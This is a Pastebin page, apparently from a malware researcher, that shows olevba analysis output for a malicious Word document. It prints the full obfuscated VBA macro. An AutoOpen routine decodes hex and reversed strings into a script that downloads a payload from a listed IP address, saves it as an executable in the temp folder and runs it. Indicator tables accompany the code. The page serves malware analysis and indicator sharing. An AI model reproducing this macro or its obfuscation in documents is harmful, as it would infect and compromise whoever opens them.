API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Apr 7th, 2015
596
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 8.22 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIH-- vm1993lvw.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: vm1993lvw.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. sdf
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module1.bas
  27. in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/Module1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. Sub sdf()
  30. jFHGVCsdf = HJbjbkljgIUGI("406563686f20677975465946477569676464642e53656e643e3e677975465946477569672e766273202620406563686f2053657420656e7669726f6e6d656e7456617273203d20575363726970742e4372656174654f626a6563742822575363726970742e5368656c6c22292e456e7669726f6e6d656e74282250726f6365737322293e3e677975465946477569672e766273202620406563686f2074656d70466f6c646572203d20656e7669726f6e6d656e7456617273282254454d5022293e3e677975465946477569672e766273202620406563686f2046696c656f70656e203d2074656d70466f6c646572202b20225c646673646666662e657865223e3e677975465946477569672e766273202620406563686f207769746820625374726d3e3e677975465946477569672e766273202620406563686f202020202e74797065203d2031203e3e677975465946477569672e766273202620406563686f20202020202e6f70656e3e3e677975465946477569672e766273202620406563686f20202020202e777269746520677975465946477569676464642e726573706f6e7365426f64793e3e677975465946477569672e766273202620")
  31. JJKJJJJJJJJJJJJd = HJbjbkljgIUGI(StrReverse("026202372667e276965774649564579776e3e35637c6166402c222669676e24303567616d696f297d687a73716f2837313e2934313e29333e2538313f2f2a3074747862202c2224554742202e65607f4e24646467696577464956457977602f686365604026202372667e276965774649564579776e3e39222d61656274735e22646f646142282473656a626f656471656273602d302d6274735260247563502a3d62747352602d6964602f686365604026202372667e276965774649564579776e3922205454584c4d485e24766f637f6273696d42282473656a626f656471656273602d302464646769657746495645797760247563502a34646467696577464956457977602d6964602f6863656040236f202568756e246d636"))
  32. GFGsdjfhf = HJbjbkljgIUGI("406563686f20202020202e73617665746f66696c652046696c656f70656e2c2032203e3e677975465946477569672e766273202620406563686f20656e6420776974683e3e677975465946477569672e766273202620406563686f205365742047424976697669753637465547424b203d204372656174654f626a65637428225368656c6c2e4170706c69636174696f6e22293e3e677975465946477569672e766273202620406563686f2047424976697669753637465547424b2e4f70656e2046696c656f70656e3e3e677975465946477569672e766273202620637363726970742e65786520677975465946477569672e766273")
  33. sdddd = JJKJJJJJJJJJJJJd + jFHGVCsdf + GFGsdjfhf
  34. Shell sdddd, 0
  35. End Sub
  36.  
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38. ANALYSIS:
  39. +------------+----------------------+-----------------------------------------+
  40. | Type       | Keyword              | Description                             |
  41. +------------+----------------------+-----------------------------------------+
  42. | Suspicious | Shell                | May run an executable file or a system  |
  43. |            |                      | command                                 |
  44. | Suspicious | StrReverse           | May attempt to obfuscate specific       |
  45. |            |                      | strings                                 |
  46. | Suspicious | CreateObject         | May create an OLE object (obfuscation:  |
  47. |            |                      | Hex)                                    |
  48. | Suspicious | SaveToFile           | May create a text file (obfuscation:    |
  49. |            |                      | Hex)                                    |
  50. | Suspicious | Open                 | May open a file (obfuscation: Hex)      |
  51. | Suspicious | Shell                | May run an executable file or a system  |
  52. |            |                      | command (obfuscation: Hex)              |
  53. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  54. |            |                      | command (obfuscation: Hex)              |
  55. | Suspicious | Write                | May write to a file (if combined with   |
  56. |            |                      | Open) (obfuscation: Hex)                |
  57. | Suspicious | Shell.Application    | May run an application (if combined     |
  58. |            |                      | with CreateObject) (obfuscation: Hex)   |
  59. | Suspicious | CreateObject         | May create an OLE object (obfuscation:  |
  60. |            |                      | StrReverse+Hex)                         |
  61. | Suspicious | ADODB.Stream         | May create a text file (obfuscation:    |
  62. |            |                      | StrReverse+Hex)                         |
  63. | Suspicious | Open                 | May open a file (obfuscation:           |
  64. |            |                      | StrReverse+Hex)                         |
  65. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  66. |            |                      | (obfuscation: StrReverse+Hex)           |
  67. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  68. |            |                      | be used to obfuscate strings (option    |
  69. |            |                      | --decode to see all)                    |
  70. | IOC        | gyuFYFGuig.vbs       | Executable file name (obfuscation: Hex) |
  71. | IOC        | dfsdfff.exe          | Executable file name (obfuscation: Hex) |
  72. | IOC        | cscript.exe          | Executable file name (obfuscation: Hex) |
  73. | IOC        | http://185.39.149.17 | URL (obfuscation: StrReverse+Hex)       |
  74. |            | 8/aszxmy/image04.gif |                                         |
  75. | IOC        | 185.39.149.178       | IPv4 address (obfuscation:              |
  76. |            |                      | StrReverse+Hex)                         |
  77. | IOC        | cmd.exe              | Executable file name (obfuscation:      |
  78. |            |                      | StrReverse+Hex)                         |
  79. | IOC        | gyuFYFGuig.vbs       | Executable file name (obfuscation:      |
  80. |            |                      | StrReverse+Hex)                         |
  81. +------------+----------------------+-----------------------------------------+
  82. -------------------------------------------------------------------------------
  83. VBA MACRO Module2.bas
  84. in file: vm1993lvw.doc - OLE stream: u'Macros/VBA/Module2'
  85. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  86. Public Function HJbjbkljgIUGI(ByVal kZtkbozi As String) As String
  87. Dim CqINRagdDXnLii12, JvigRuKAuHzAIK17 As Integer
  88. JvigRuKAuHzAIK17 = 2912
  89. For CqINRagdDXnLii12 = 0 To 65
  90. JvigRuKAuHzAIK17 = JvigRuKAuHzAIK17 + CqINRagdDXnLii12
  91. DoEvents
  92. Next CqINRagdDXnLii12
  93.  
  94. For TQmHIRcQAPjC = 1 To Len(kZtkbozi) Step 2
  95. UGiEQf = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(kZtkbozi, TQmHIRcQAPjC, 2)))
  96. ePUuigaspLiGL = ePUuigaspLiGL & UGiEQf
  97. Next TQmHIRcQAPjC
  98. HJbjbkljgIUGI = ePUuigaspLiGL
  99. End Function
  100. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  101. ANALYSIS:
  102. +------------+---------+-----------------------------------------+
  103. | Type       | Keyword | Description                             |
  104. +------------+---------+-----------------------------------------+
  105. | Suspicious | Chr     | May attempt to obfuscate specific       |
  106. |            |         | strings                                 |
  107. +------------+---------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!